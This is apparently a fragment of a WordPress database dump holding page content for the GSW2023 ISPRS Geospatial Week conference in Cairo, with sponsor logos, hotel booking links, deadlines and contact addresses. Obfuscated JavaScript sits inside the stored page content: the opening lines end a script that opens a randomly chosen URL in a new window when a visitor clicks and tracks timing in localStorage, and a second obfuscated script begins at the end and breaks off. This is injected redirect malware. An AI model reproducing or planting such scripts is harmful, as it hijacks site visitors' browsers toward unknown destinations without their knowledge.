_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-20 00:11:09','2023-06-20 00:11:09','',3066,'https://gsw2023.com/?p=4723',0,'revision','',0),
(4724,1,'2023-06-20 00:11:42','2023-06-20 00:11:42','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 